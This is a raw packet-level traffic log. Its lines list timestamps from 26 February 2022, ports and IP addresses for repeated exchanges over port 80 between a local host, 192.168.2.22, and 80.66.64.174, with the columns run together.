                                                                                                  Feb 26, 2022 09:31:19.750976086 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.750993013 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.751008987 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.751014948 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.751020908 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.751027107 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.751030922 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.751044035 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.751046896 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.751061916 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.751064062 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.751070976 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.751745939 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.753241062 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.753257990 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.753294945 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.753312111 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.753313065 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.753334999 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.753336906 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.753350019 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.753353119 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.753375053 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.754688978 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.754708052 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.754712105 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.754725933 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.754743099 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.754760027 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.754764080 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.754770041 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.754777908 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.754793882 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.754798889 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.754802942 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.754811049 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.754827976 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.754831076 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.754837036 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.754846096 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.754863977 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.754873037 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.754878998 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.754880905 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.754890919 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.754899025 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.754916906 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.754920006 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.754925966 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.754935026 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.754951954 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.754956961 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.754961967 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.754971027 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.754987001 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.754992962 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.754997969 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.755004883 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.755009890 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.755022049 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.755023956 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.755043030 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.755044937 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.755059958 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.755063057 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.755079031 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.755081892 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.755098104 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.755099058 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.755115032 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.755119085 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.755134106 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.755135059 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.755151987 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.755155087 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.755170107 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.755177021 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.755187988 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.755197048 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.755206108 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.755211115 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.755223036 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.755228996 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.755240917 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.755248070 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.755259991 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.755270004 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.755278111 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.755286932 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.755295992 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.755300045 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.755315065 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.755321980 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.755332947 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.755338907 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.755351067 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.755362034 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.755368948 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.755378008 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.755386114 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.755394936 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.755403042 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.755409002 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.755420923 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.755424976 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.755439043 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.755445004 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.755455971 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.755460978 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.755472898 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.755477905 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.755490065 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.755492926 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.755497932 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.755507946 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.755525112 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.755528927 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.755541086 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.755551100 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.755557060 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.755558014 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.755577087 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.755579948 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.755594015 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.755597115 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.755613089 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.755616903 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.755630970 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.755636930 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.755652905 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.759890079 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.850184917 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.850214958 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.850230932 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.850248098 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.850264072 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.850280046 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.850296021 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.850313902 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.850320101 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.850332022 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.850348949 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.850357056 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.850362062 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.850366116 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.850367069 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.850369930 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.850383997 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.850384951 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.850402117 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.850405931 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.850419044 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.850419998 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.850435972 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.850440025 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.850455046 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.850455999 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.850471973 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.850472927 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.850490093 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.850491047 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.850507975 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.850509882 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.850524902 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.850526094 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.850543022 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.850544930 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.850560904 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.850562096 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.850579023 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.850580931 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.850596905 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.850599051 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.850620985 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.850630999 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.850639105 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.850641966 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.850656986 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.850658894 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.850677013 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.850677013 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.850694895 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.850697994 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.850713015 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.850719929 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.850727081 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.850744009 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.850745916 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.850756884 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.850764036 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.850780964 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.850797892 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.850802898 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.850815058 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.850819111 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.850831985 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.850833893 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.850851059 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.850852013 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.850868940 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.850871086 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.850876093 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.850887060 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.850904942 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.850908995 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.850922108 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.850925922 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.850940943 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.850950003 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.850958109 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.850967884 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.850975990 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.850980997 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.850994110 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.851000071 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.851011992 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.851015091 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.851030111 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.851032972 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.851048946 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.851051092 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.851066113 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.851069927 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.851083040 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.851094007 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.851100922 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.851105928 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.851119041 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.851123095 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.851136923 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.851146936 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.851154089 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.851155043 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.851172924 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.851172924 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.851191044 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.851192951 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.851207972 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.851217031 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.851223946 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.851233959 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.851243019 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.851247072 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.851259947 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.851264000 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.851278067 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.851280928 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.851295948 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.851300001 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.851315022 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.851316929 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.851332903 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.851335049 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.851350069 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.851353884 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.851367950 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.851372957 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.851387978 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.851401091 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.851403952 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.851423025 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.851438999 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.851444006 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.851455927 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.851459026 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.851475000 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.851478100 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.851490974 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.851492882 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.851509094 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.851512909 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.851526976 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.851531982 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.851542950 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.851547956 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.851561069 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.851566076 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.851577997 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.851584911 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.851591110 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.851597071 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.851613998 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.851617098 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.851632118 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.852013111 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.852020979 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.852024078 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.852231026 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.852304935 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.852318048 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.852355957 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.852370977 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.852400064 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.852410078 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.852411985 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.852427006 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.852443933 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.852446079 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.852459908 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.852463961 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.852480888 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.852503061 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.852507114 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.852509975 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.852529049 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.852535963 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.852545977 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.852559090 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.852562904 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.852566004 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.852575064 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.852581024 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.852593899 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.852600098 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.852621078 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.852641106 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.853564978 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.853607893 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.853624105 CET804916780.66.64.174192.168.2.22
                                                                                                  Feb 26, 2022 09:31:19.853653908 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.853667974 CET4916780192.168.2.2280.66.64.174
                                                                                                  Feb 26, 2022 09:31:19.853682995 CET804916780.66.64.174192.168.2.22
